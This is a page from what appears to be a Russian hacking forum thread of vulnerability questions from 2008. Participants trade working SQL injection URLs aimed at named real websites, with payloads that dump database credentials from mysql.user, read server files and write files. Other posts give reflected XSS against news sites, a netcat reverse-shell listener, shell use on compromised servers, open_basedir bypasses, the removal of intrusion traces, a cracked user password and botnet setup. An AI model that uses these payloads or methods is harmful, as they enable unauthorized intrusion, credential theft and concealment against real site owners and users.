PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18] 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

groundhog
22.12.2008, 18:25
таблицы user нету в той базе, в которой работает сайт.

iddqd
22.12.2008, 18:26
нет такой таблицы.
сначала попробуй вытащить названия всех таблиц через information_schema

$p01nt
22.12.2008, 18:28
Через информатион.схема и вытащил!!!
Потом прочитал все columns и вот сейчас выдает это!!
Если кому-то не лень, стукните в аську 24-три9-24 плиз :)

aka PSIH
22.12.2008, 18:36
посмотри базу в которой таблица лежит...
select table_schema from information_schema.columns where table_name='users'
select concat_ws(0x3a,table_schema,table_name,column_name ) from information_schema.columns

zenon2
22.12.2008, 23:00
Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.

hackmen
22.12.2008, 23:40
Хочу вывести название колонок, но при
/video.php?id=-9999+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+fr om+IINFORMATION_SCHEMA.COLUMNS+where+table_name='l ogin_access'--
Выводит
query failed:SELECT * FROM podcast WHERE id=-9999 union select 1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43 from IINFORMATION_SCHEMA.COLUMNS where table_name=login_access-- ORDER BY date DESC LIMIT 0,1
Пробовал
-9999+union+select+1,2,3,4,5,column_name,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+fr om+IINFORMATION_SCHEMA.COLUMNS+where+table_name=(0 x6c6f67696e5f616363657373)--
Выводит почти тоже самое
query failed:SELECT * FROM podcast WHERE id=-9999 union select 1,2,3,4,5,column_name,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43 from IINFORMATION_SCHEMA.COLUMNS where table_name=(0x6c6f67696e5f616363657373)-- ORDER BY date DESC LIMIT 0,1

Может я чего не так делаю или как нибудь по другому нужно. Хелп, плиз.
Версия 5.0.45-log

Pashkela
22.12.2008, 23:48
Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.

попробуй concat_all

2 hackmen:

скобки убери, когда хексишь, и "--" пишется в конце всех запросов и условий

desTiny
22.12.2008, 23:49
вместо -- пиши /*
это тебе не мсскл

ну и кавычки ещё по-хорошему писать надо

freddi
22.12.2008, 23:51
hackmen, чтоза IINFORMATION_SCHEMA ?

hackmen
23.12.2008, 04:43
hackmen, чтоза IINFORMATION_SCHEMA ?
Вот черт =)
Спасиб!

[Raz0r]
23.12.2008, 12:01
Может кто подскажет какая есть альтернатива функции LIMIT в Oracle. Хотелось просмотреть название таблиц и колонок.
http://forum.antichat.ru/showpost.php?p=449408&postcount=5

zenon2
23.12.2008, 15:16
[QUOTE=Pashkela]попробуй concat_all

Привиди пример. А то что то у меня ничего не выходит.

SHS
23.12.2008, 17:14
MSSQL:
Можно ли одним запросом вывести все таблицы c соответствуюющими им колонками? (в файл через makewebtask)

Ghost0ff
23.12.2008, 18:00
В моей практике я такого не замечал. возможно вывести все таблицы которые есть в строчку, то есть если тебе выдает по одному столбцу или колонке не обязательно юзать limit а возможно посмотреть вомандой group_concat Пр: =-1+union+select+1,group_concat(unhex(hex(table_name ))),3+from+information_schema.tables--
выведутся все таблицы в строчку через запятульку. так же и с колонками в таблице. Способ упрощает твою задачу во много раз. Удачи

ThreeD
23.12.2008, 18:05
Ghost0ff
это в mysql,а человек спрашивает за mssql.
Тем более, что group_concat() выводит только первую 1000 знаков (или как то так), если не ошибаюсь. Но все таблицы ты не выведешь.

Spyder
23.12.2008, 18:29
zenon2

LIMIT 1 OFFSET 1

Spyder
23.12.2008, 18:35
а, ступил, это в постгрессе

[Raz0r]
23.12.2008, 20:05
@SHS
'; EXEC sp_makewebtask 'c:\inetpub\wwwroot\out.htm', "SELECT * FROM information_schema.COLUMNS";--

@zenon2
используй способ, который я привел в ссылке. Имхо более подоходящего не найти

F4R
23.12.2008, 21:50
посмотрите плиз
http://www.mk-computer.ru/catalog.php?cat=1&sort=-1
это скуль?

diznt
23.12.2008, 22:12
F4R не совсем но тут может быть скуль
попробуй поподбирай поля!
если не подбираються значит ее нету

spherics
23.12.2008, 22:22
посмотрите плиз

это скуль?


Нет,но это скуля

http://www.mk-computer.ru/news.php?detail=-128+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7--

l1ght
23.12.2008, 22:37
это скуль?
да это скуль после order by
_mk-computer.ru/catalog.php?cat=1&sort=cena*(substring(version(),1,1)=4)--+

F4R
23.12.2008, 23:01
как бы ещё бы щас подобрать таблу...
что-б в админку попасть))

crazy~driver
24.12.2008, 02:07
помогите тож с скуль иньектом
проблема что фильтруются
запрос sportID=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,CHAR(39,60,115,99,114,105,112,116,62,97 ,108,101,114,116,40,50,49,51,41,32,60,47,115,99,11 4,105,112,116,62,39),20+from+t_sports+order+by+lev el+into+outfile+'/tmp/1.txt'/*
Так как путь указан с кавычками то выпрыгивает ерор:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/tmp/1.txt''/* ORDER BY Level' at line 1
Как обойти фильтрацию?

gisTy
24.12.2008, 02:17
в хекс переведи или в чар

$n@ke
24.12.2008, 02:40
обойди с пхпмайдмина)) путь нельзя хексить или чаром...надо только текстом))

crazy~driver
24.12.2008, 02:47
gisTy путь чарить нельзя
а можно подробнее как можно обойти с пхпмайадмина

Spyder
24.12.2008, 02:49
получаешь логин:пасс юзера, ищешь майадмин и через него льёш шелл

gisTy
24.12.2008, 02:58
gisTy путь чарить нельзя
а можно подробнее как можно обойти с пхпмайадмина
а че и в хекс перевести нельзя чтоле?

crazy~driver
24.12.2008, 02:59
ага тока с подбором таблиц тож проблема
да и к майадмин доступ запрещен

Spyder
24.12.2008, 03:10
gisTy

там надо чисто текст в кавычках передовать, хексы и тп не работают

Spyder
24.12.2008, 03:12
crazy~driver
имеется ввиду таблица mysql.user
если у юзера к ней прав нет, можно поискать скули на соседних сайтах

crazy~driver
24.12.2008, 03:47
спс spyder

crazy~driver
24.12.2008, 03:48
других вариантов нет?

Valtron
24.12.2008, 04:05
ищи скули на других сайтах

Zitt
24.12.2008, 07:08
diznt, из шелла конектись к серваку рутай и ставь что надо........
скачай netcat? хапусти и набери nc -l -n -v -p 3137, в шелле пропиши свой РЕАЛЬНЫЙ ip и нажми бакконект....

svesve
24.12.2008, 16:28
Скуля??
http://vdex.spb.ru/photo/subcat.php?id_catalog=%27
просто на такой же цмске раскрутил нормально а здесь что то никак(

AFoST
24.12.2008, 16:35
Слепая sql-inj
http://vdex.spb.ru/photo/subcat.php?id_catalog=3/**/union/**/select/**/1,2/*

B1t.exe
24.12.2008, 17:24
ребята, помогите по братски. надо как небудь проникатся один форум на движке: vBulletin® Version 3.7.3.
поиском конечно пользовался и нашел вот этот эксплоит: http://milw0rm.com/exploits/7174

Теперь никак не могу понять как волпользоватся данным эксплоитом. можете помочь ?
а также был бы очень рад, если подсказали другие способы.

aka PSIH
24.12.2008, 18:48
-m0rgan-
омг, какой си ?? Это js


сохраняешь код в nbd.js, заливаешь на сервер
дальше по инструкции:

The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach.


+
.для него качай интерпретатор и запускай через него этот сплойт...
Си сплойты надо сначала скомпилировать, а потом запускать... ;)

sabe
24.12.2008, 23:58
Spyder
был бы разрешен я бы об этом обезательно написал )

ILYAtirtir
там все просто..

Велемир
25.12.2008, 17:44
5.1.2600.2180.
Почему при удаленном коннекте меня выкидывает ? Версия-то termsrv.dll не старая.

tsesar
26.12.2008, 06:16
http://www.newsarmenia.ru/search/?p=0&query=%22%3E%3Cscript%3Ealert(%2FoO%2F)%3C%2Fscrip t%3E

tsesar
26.12.2008, 06:20
http://www.newsazerbaijan.ru/search/?p=0&query=%22%3E%3Cscript%3Ealert(%2FoO%2F)%3C%2Fscrip t%3E

tsesar
26.12.2008, 06:23
http://www.pln-pskov.ru/search/?text="><script>alert(%2FoO%2F)<%2Fscript>&sortby=time

tsesar
26.12.2008, 06:35
http://lipetsknews.ru/search/?search=%3C%2Fscript%3E%3Cscript%3Ealert%28%2FoO%2 F%29%3C%2Fscript%3E&k=%CD%E0%E9%F2%E8

tsesar
26.12.2008, 06:37
http://www.snews.ru/search.php

ThreeD
26.12.2008, 09:51
tsesar
Ничего не перепутал? xD

B1t.exe
26.12.2008, 19:17
ребята, помогите по братски. надо как небудь проникатся один форум на движке: vBulletin® Version 3.7.3.
поиском конечно пользовался и нашел вот этот эксплоит: http://milw0rm.com/exploits/7174

Теперь никак не могу понять как воспользоватся данным эксплоитом. можете помочь ?
а также был бы очень рад, если подсказали другие способы.

ну или хоть скажите суть этого эксплоита.

[dei]
26.12.2008, 19:52
B1t.exe
XSS в модуле Visitor Messages

B1t.exe
26.12.2008, 20:15
[dei]
ну да, это круто, но мне надо понять эффективнось этого скрипта, суть..
и вообше стоит братся за это - в целях взлома форума ?

Thrasher88
26.12.2008, 21:31
Подскажите, как можно раскрутить скулю
http://www.world-art.ru/people.php?id=-1'
Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.

masternet
26.12.2008, 22:41
Подскажите, как можно раскрутить скулю

Там инъекция есть, просто сразу перебрасывает на страницу с ошибкой, поэтому вернитесь на страницу назад.
c чего ты взял что там есть инъекция?вывод на 1 и на 9999 одинаковый..по моему там скулей даже и не пахнет..

Thrasher88
26.12.2008, 22:44
Ну хз скуля это или нет.. вот что выводит:
Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /usr/local/www/vhosts/world-art.ru/httpdocs/people.php on line 1889

$p01nt
26.12.2008, 23:05
admin:4b6dP//qJjChSbt+7It3DYY=
Что за хеш?

-m0rgan-
26.12.2008, 23:20
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...

159932
26.12.2008, 23:30
Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
не сказал бы что очень уж похоже не дес, и как понять что с форума ? :D

походит на base64, а точнее на md5-base64 .. хотя не зватает 4х символов ..

Jokester
26.12.2008, 23:39
хотя не зватает 4х символов ..
Всё там хватает :) у них по 24, одна из этих :

MD5(Base64)
MD4(Base64)
MD2(Base64)

Чем то похоже на DES (Unix)....Скорее всего с какого то форума...
Мда (с) :D

sabe
27.12.2008, 08:52
как оно?
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+or+1=2/*
хз не подберается)
http://www.astafiev.ru/forum.php?UID=16197+union+select+1,2/*
вывода нету чтоли?
http://juggling.tv/vaults/uvideos.php?UID=347+or+1=1/*
немогу разкуртить =0
http://www.fortwaynereader.com/story.php?uid=-728+or+1=1

R1dex
27.12.2008, 11:21
http://juggling.tv

http://juggling.tv/vaults/uvideos.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7, 8,9,20,21,2,3,4,5,6,7,8,9,30,31,2,3,4,5--

____________________________________________

http://www.astafiev.ru

Да, без вывода.

____________________________________________

http://www.fortwaynereader.com

Тут, похоже, нужно указывать группировку по полю

sabe
27.12.2008, 12:12
R1dex juggling.tv
принтабельных тож нету? )

http://www.legis.krsn.ru/lawsinfo.php?UID=705+union+select+1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9
не подбор )

R1dex
27.12.2008, 12:27
R1dex juggling.tv
принтабельных тож нету? )

Ага.

http://www.legis.krsn.ru/

http://www.legis.krsn.ru/lawsinfo.php?UID=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

sabe
27.12.2008, 12:39
R1dex
угу.. нужно брутить) там еще и sobranie.info домен )
http://www.sobranie.info/adm/

кста стукни;)

faza02
27.12.2008, 14:11
http://www.mymaika.ru/page.php?id=-120+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
подобрал, вроде 14. но ошибка
в чем трабл?

R1dex
27.12.2008, 14:25
Трабла в том, что это 3-я ветка. В ней нету оператора объединения запросов union.

Red_Red1
27.12.2008, 14:54
2 R1dex , sabe
http://www.astafiev.ru/topic.php?UID=-119+union+select+111,version()/*
Есть вывод ;)

R1dex
27.12.2008, 15:11
Да, тут есть, но конкретно в том случае - нету. ;)

Thrasher88
27.12.2008, 16:14
В соседней темы выкладывалась скуля
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--
Почему при
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7,8,9+from+drupalusers--
Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR :(

Iceangel_
27.12.2008, 16:21
Вылазит ошибка Fatal error: Call to a member function recordcount() on a non-object in /home/yesoudo/www/channel_detail.php on line 14??
Пробовал переводить название таблицы в CHAR :(
потому что таблица находится в другой базе
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,login,pass),3,4 ,5,6,7,8,9+from+garmenia.drupalusers--


Bonus;)
доступ к mysql.user:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat(user,0x3a,password,0x3a,h ost,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.user--

чтение фалов:
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,LOAD_FILE(CHAR(47,104,111,109,10 1,47,121,101,115,111,117,100,111,47,119,119,119,47 ,99,104,97,110,110,101,108,95,100,101,116,97,105,1 08,46,112,104,112)),3,4,5,6,7,8,9--

Octave_Parango
27.12.2008, 16:25
Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?

Nightmarе
27.12.2008, 16:31
Подскажите, что за косяк:
Скуля 4-ка:
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,concat(userna me,0x3a,password),12,13,14+from+adminrights limit 0,1--
Перебираю лимитом: 0,1 - выводит - все ОК., ввожу 1,1 - выскакивает ошибка:
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1"
Что делаю не так?
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.

Octave_Parango
27.12.2008, 16:37
Надо крутить либо 0,2 0,3 0,4 или 2,1 3,1 4,1 одно из двух, везде работает по разному.

Пробовал, до полусотни докрутил.

j0ker13
27.12.2008, 16:43
2Octave_Parango дык мож там тока одна запись?)

Thrasher88
27.12.2008, 16:50
потому что таблица находится в другой базе
расшифровал хеш юзера, но почему то не заходит в аккаунт... (
login 1225532271
pass arnaud2007
name michamk

Странно..

Octave_Parango
27.12.2008, 16:56
j0ker13, что-то мне кажется, что так оно и есть.

Pashkela
27.12.2008, 17:14
2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--

Octave_Parango
27.12.2008, 17:21
2 Octave_Parango:

проверь так:

http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,group_concat( username,0x3a,password),12,13,14+from+adminrights--

Отображается так же одна запись как и при limit 0,1

Получается там все одна запись?

Pashkela
27.12.2008, 17:26
да, 100%, иначе group_concat вытащил бы несколько записей по любому

и потом чо тут удивительного, что админ всего один. Обычно их больше 3-5 и не бывает.

-m0rgan-
27.12.2008, 17:28
Похоже на то...

Jokester
27.12.2008, 17:30
Я что-то пропустил. или count() отменили? )

Разве так не проще?
http://www.site.com/amino.php?id=-56+union+select+1,2,3,4,5,6,7,8,9,10,count(*) ,12,13,14+from+adminrights--

Octave_Parango
27.12.2008, 17:33
jokester, Действительно, так проще, и запись действительно одна.

ThreeD
27.12.2008, 19:20
jokester
Если не ошибаюсь, то count() и null ячейки будет считать,и пустые.
Например покажет, что записей 25, а будет всего 3, остальные пустые.Но он их посчитает.

Imperou$
27.12.2008, 21:04
Для начала всех с наступающим новым годом ))
Теперь вопрос.
Поимел шелл на серваке, не на том сайте, который мне нужен,но надеясь получить к нему доступ.
Safe_mode оказался: OFF
Нахожусь в директории где шелл (путь)
/home/s/site/site.com/public/www/admin/
При попытке перейти в директорию /home/ редиректит назад на /home/s/site/site.com/public/www/admin/
Шелл
(r57shell v.1.42)
Если выполняю команду ls -la /home/ переходит удачно и всё показывает. Так добрался до нужного мне сайта
ls -la /home/t/target/target.com/public/www/
Там нашёл файл config.php, с данными для коннекта к бд.
Как мне его прочитать?
Скачать не получилось
Ввожу в :: Download files from server :: путь к файлу
/home/t/target/target.com/public/www/config.php
редиректит назад в директорию с шеллом.
Если выполняю команду
more /home/t/target/target.com/public/www/config.php
или
more config.php
выдаёт пустой экран в шелле.
Что делать? Я почти неделю убил на поиск уязвимостей, и тут такой облом :'(

Вот стат с шелла

PHP version: 5.2.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF MySQLi: ON mSQL: OFF SQLite: ON
Safe_mode: OFF Open_basedir: VIRTUAL_DOCUMENT_ROOT:/usr/local/lib/php:/usr/local/lib/ph:/home/sys/phplib/:/usr/local/bin/ Safe_exec_dir: /usr/local/php/bin Safe_gid: OFF Safe_include_dir: NONE Sql.safe_mode: OFF
Disable functions : NONE
Free space : 0 B Total space: 0 B
Useful: mod_include(SSI)
Dangerous: -
Downloaders: fopen

И ещё вопрос. Все сайты на одном серваке, но на многих PHP version: 5.2.6 а на некотрых четвёртая. (в том числе и на том, на который я залил шелл) Как так?
Помогите прочитать файл плз (или скачать его).Очень прошу.

Pashkela
27.12.2008, 21:39
Попробовать сделать так - написать и залить туда такой скрипт:


<?
$file = file_get_contents("абсолютный_путь_к_файлу");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>

ThreeD
27.12.2008, 21:59
2
Pashkela +
2
Imperou$
Если не выйдет-из папки с шеллом выполняем
tar -czvf arch.tar.gz /home/t/target/target.com/public/www/
можешь и файл вписать.
Cоздаст архив arch.tar.gz в папке с шеллом, внутри будет необходимое тебе содержание.Просто скачай и смотри.

Imperou$
27.12.2008, 22:18
ThreeD
Спасибо, плюс.
Но архивит весь сайт =) Теперь качаю.
Pashkela
Warning: file_get_contents() [function.file-get-contents]: open_basedir restriction in effect. File(/home/t/target/target.com/public/www/config.php) is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2

ThreeD
27.12.2008, 22:25
Хыыы...
Теперь у меня вопрос =)
Нифига не могу удалить через шелл с сервака свои залитые файлы. Т.е. залить любой могу, а вот удалить нет.
Ни
rm
rm -r
rm -f
rm -rf
Не помогают =(
Вопрос, как быть? Снести надо сроооочно, иначе ппц паливо устроят.

Pashkela
27.12.2008, 22:27
2 ThreeD:

http://ru2.php.net/manual/ru/function.chown.php
http://ru2.php.net/manual/ru/function.chmod.php

Главное: http://ru2.php.net/unlink


2 Imperou$:


is not within the allowed path(s) in /home/s/site/site.com/public/www/1.php on line 2


вообще-то это тот сервер, где ты сейчас со своим шеллом сидишь, возьми да поправь

ThreeD
27.12.2008, 22:35
Pashkela
В php не силён.Давай подробнее. Кодить не умею я =)

Pashkela
27.12.2008, 22:38
Делаешь такой скрипт, обзываешь его del.php к примеру, заливаешь на сайт:


<? unlink ('абсолютный_путь_ до_файла/то_что хотим_удалить');
unlink ('абсолютный_путь_ до_файла/del.php'); //Самоудаляемся, не оставляем вообще никаких следов, кроме как в логах фтп и прочих
?>


запускаешь

Imperou$
27.12.2008, 22:42
Pashkela

Я залил скрипт 1.php с таким содержанием

<?
$file = file_get_contents("/home/t/target/target.com/public/www/config.php");
if(!file) echo 'Ошибка открытия файла';
else echo $file;
?>


на серв /home/s/site/site.com/public/www/
Что поменять?? o_O

Pashkela
27.12.2008, 22:46
2 Imperou$:


in /home/s/site/site.com/public/www/1.php on line 2

Забей, юзай способ от ThreeD, только в конце укажи название файла, а не просто директорию

zenon2
27.12.2008, 22:51
Народ есть sql inj. Определяю через group by что количество столбцов 5. Но когда пытаюсь использовать id=1'+union+select+1,2,3,4,5/* говорит Query failed: The used SELECT statements have a different number of columns хотя group by говорит что их именно 5. В чем может быть проблема?

На запрос id=1' получаю ответ Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' ORDER BY issue_date DESC LIMIT 1' at line 3

Такое впечатление что injection тут после ORDER BY. Но что то я не могу найти где подробней про нее почитать. Может кто подскажет ?

Pashkela
27.12.2008, 22:54
Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj

zenon2
27.12.2008, 22:57
Сначала надо оценить и правильно понять первоначальную ошибку при выявлении sql-inj. Если в тексте ошибки есть что-то типо left join - значит в запросе участвует не одна таблица, а как минимум две, то данные не выведутся скорее всего, фактически получается blind sql inj


Все ошибки что есть я запостил.

Pashkela
27.12.2008, 23:01
если можешь, ссылку кинь в личку

Pashkela
28.12.2008, 00:07
Короче нашел, лень в аську выходить просто:))

http://сайт.ru/print.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,10, version(),12/*

просто ты неправильно подобрал кол-во колонок. Лучше всегда подбирать через order+by, т.к. там всегда пишет конкретно, а не фигню всякую.

Поздравляю, там 4.1.20-log:)

Только брут

Thrasher88
28.12.2008, 00:48
Помогите, пжста, подобрать колонки ;)
:)) все подобрал ))

Pashkela
28.12.2008, 00:54
Смешной парень, личка тебе уже не поможет:)

http://www.spoonohost.com/about/news.php?id=-1+union+select+1,2,3,4,version()--

Thrasher88
28.12.2008, 01:01
Ну и что ты этим хотел сказать?? я знаю какая версия БД.. :/

I love this game
28.12.2008, 01:05
Thrasher88, т.к. тут 4ая версия mysql, тебе прийдеться угадывать колонки, можно вручную или можешь попробовать с помощью программы SIPT 4!Пока нашел токо: id

Pashkela
28.12.2008, 01:08
2 Thrasher88:

личку читай

ThreeD
28.12.2008, 01:09
Thrasher88
Лови, больше ничего не подобрал.
id
ip
lastname
phone
status
zip
Раз линк засветил, глупо скрывать в лс =)

I love this game
28.12.2008, 01:11
Вот еще подобрал: nickname

Octave_Parango
28.12.2008, 01:13
Ребята, подскажите.
Залил шелл, на сервере хостятся еще порядка 700 сайтов, такой вопрос, могу ли я "полазить" по рядом лежащим или только по одному?

I love this game
28.12.2008, 01:17
Octave_Parango, выйди в начальную директорию и попробуй(если сайты находятся на одном серваке, то по идее да!), мож шелом в лс поделиться если хоч, посмотрю!

ThreeD
28.12.2008, 01:23
Octave_Parango
Посмотри на шелле, safe_mode включён или нет.
Если выключен-лезь в корень.
ls -la /home/ или просто /home/
можно просто /
Смотря как у тебя начинается путь.

diznt
28.12.2008, 01:46
И так есть форум на IPB 2.3.5
там я нашол папку "convert"
когда я перешол в эту папку (то есть в строке браузера sait.ru/convert)
то там увидел что можно посмотреть путь к сайту (то есть D:\blabla\blabla\sait.ru\www)
логин и пароль к БД
Что это вообще такое?
Я потом порыскал в гугле и нашол что это какой то плагин IPB и связанное что то с SMF
сылка dev.russiangun.ru/convert/

Octave_Parango
28.12.2008, 02:21
I love this game, Да. разобрался чиво где, спасибо.

ThreeD, safe_mode OFF, в /home не могу зайти, пишет: Can't open folder (/home/)!
file-mode (/home), drwx--x--x.
Прав что ли не хватает?

ThreeD
28.12.2008, 02:25
выполни команду ls -la /home/

Pashkela
28.12.2008, 02:26
лучше просто ls

ls -la не всегда прокатывает

Octave_Parango
28.12.2008, 02:34
Пробавал уже и ls и ls -la , все так же Can't open folder (/home/)!

ThreeD
28.12.2008, 02:40
Эммм...
А у тебя вообще есть папка home ?

Octave_Parango
28.12.2008, 02:50
ThreeD, Да, есть.
По остальным лазию, все ОК, а в эту и в еще пару, ни в какую.

Pashkela
28.12.2008, 02:51
попробуй поменять права на папку:

http://ru2.php.net/manual/ru/function.chmod.php

ЗЫЖ Рекомендация - текст по ссылке читать сверху до низу всю и вкуривать конкретно

Octave_Parango
28.12.2008, 02:55
Pashkela, есть, пошел изучать. Доброй ночи всем.

ThreeD
28.12.2008, 03:00
Поимел буржуйского хостера.
Где они обычно хранят пароли от фтп?? Кто в курсе?

Pashkela
28.12.2008, 03:07
Честно говоря вовсе не обязательно хранить пароли на сервере. Их элементрано можно хранить например в БД. Или в .txt на совершенно другом сервере. Всё по ситуации

ThreeD
28.12.2008, 03:15
Ну как то ведь авторизация проходит, при логине юзера.С чем то сравниваются логины и пасы (я просто не в курсе).
В бд их нет.

AkyHa_MaTaTa
28.12.2008, 04:00
Ну как то ведь авторизация проходит, при логине юзера.С чем то сравниваются логины и пасы (я просто не в курсе).
В бд их нет.
какой фтп сервак?

Pashkela
28.12.2008, 04:02
А я вам так скажу, судя по гуглу (хотя вполне вероятно, я не прав) - у каждого хостера свои индивидуальные способы хранения и проверки паролей ftp доступа, это типо тайна за семью печатями. Скорее всего охренеть какой алгоритм шифрования, даже если и на серваке хранятся. Ну наверное они таки об таких вещах позаботились. Не всё так просто, даже если и шелл.

ThreeD
28.12.2008, 04:12
Pashkela
Понятно.
Ну если о багах не позаботились, думаю и с фтп попроще будет =) Просто интересны наиболее часто встречающиеся места.
AkyHa_MaTaTa
В смысле какой? Конкретизируй вопрос.

Pashkela
28.12.2008, 04:39
Ну если о багах не позаботились, думаю и с фтп попроще будет =)


не факт, можно купить хостингт и залить свой "шелл" вполне легально (зарегить сайт там, где ломаешь), дырки нет, но это не значит, что "можно будет смотреть все фтп-пароли". Хотя бы даже исходя из таких соображений, что ты потенциальный клиент, но безопасность безопасностью

diznt
28.12.2008, 04:44
хочу организовать ботнет. можно ли тут без домена абузоустойчивого организовать?

159932
28.12.2008, 04:47
хочу организовать ботнет. можно ли тут без домена абузоустойчивого организовать?
а чем тебя ip не устраивает?

diznt
28.12.2008, 04:48
всмысле. то есть можно забабахать денвер на комп запустить и будет как абузоустойкий ты хочешь сказать? :D

ThreeD
28.12.2008, 05:06
2 Pashkela
Дыры имеются ввиду на сайте самого хостера.
Да и если толком, то чтобы таких казусов не возникало, safe_mod надо включать.
Ты меня не удивил )))

ThreeD
28.12.2008, 05:08
diznt
Можно, но твоему ботнету придёт пиз**ц после первой абузы.
Да и что это будет за ботнет, если владелец не может себе абуз хост купить? =)
На ломанных запалят быстро.
Трафф ты собираешься гнать с фрэймов как я понимаю? Вот от одного админа одна абуза, и всё.

159932
28.12.2008, 05:13
всмысле. то есть можно забабахать денвер на комп запустить и будет как абузоустойкий ты хочешь сказать? :D
при чём тут денвер и домен ??
хостер, да, лучше чтобы был абузный.. но про хост речь не шла ..
а домен тебе зачем спрашиваю!? если можешь вместо домена ip юзать.

diznt
28.12.2008, 05:19
если можешь вместо домена ip юзать.

я не понимаю как это? объясни

ThreeD
28.12.2008, 05:40
Набери в браузере 77.88.21.3
попадёшь на яндекс.
Вот так и ты, можешь юзать вместо домена - ip.
Тебе ведь не клиентов заманивать, а трафф принимать. Для ботнета самое то.

159932
28.12.2008, 05:41
я не понимаю как это? объясни
эм.. ну что сказать, сразу напрашивается вопрос - тебе это надо ? :D
по сабжу: боты же должны куданить отстукивать? или к ним снизойдёт озарение и они сами придумают чтобы такого сделать ..
так вот, какая им разница куда стучать??
--
и вообще, нах домен абузный, ты ж не спамить домен собрался ..
ну допустим на связку один домен/ip, а на ботнет уже стоит другой .. хотя на одном тож никто не мешает делать .. но энто лишнее паливо всёже .. хотя на абузном серваке пох ваще.

lmns
28.12.2008, 19:22
хелп.
нашёл скулю
http://site.ru/index.php?id_page=216&id_news=36+union+select+1,2,3,concat(table_name,0x 3a,column_name),5+from+information_schema.columns
вывело кучу всего

TRIGGERS:CREATED
TRIGGERS:SQL_MODE
TRIGGERS:DEFINER
USER_PRIVILEGES:GRANTEE
USER_PRIVILEGES:TABLE_CATALOG
USER_PRIVILEGES:PRIVILEGE_TYPE
USER_PRIVILEGES:IS_GRANTABLE
VIEWS:TABLE_CATALOG

(часть списка)

Но читать их не получается, всегда ошибка Table doesn't exist
Можно что-нибудь сделать?

aka PSIH
28.12.2008, 19:29
посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name

lmns
28.12.2008, 19:40
посмотри бд в которой они хранятся
select table_schema from information_schema.columns where table_name='name'
или сразу так выводи
select+1,2,3,concat(table_schema,0x3a,table_name,0 x3a,column_name),5+from+information_schema.columns

потом ....+from+dbname.table_name

вывелось так

information_schema:TRIGGERS:CREATED
information_schema:TRIGGERS:SQL_MODE
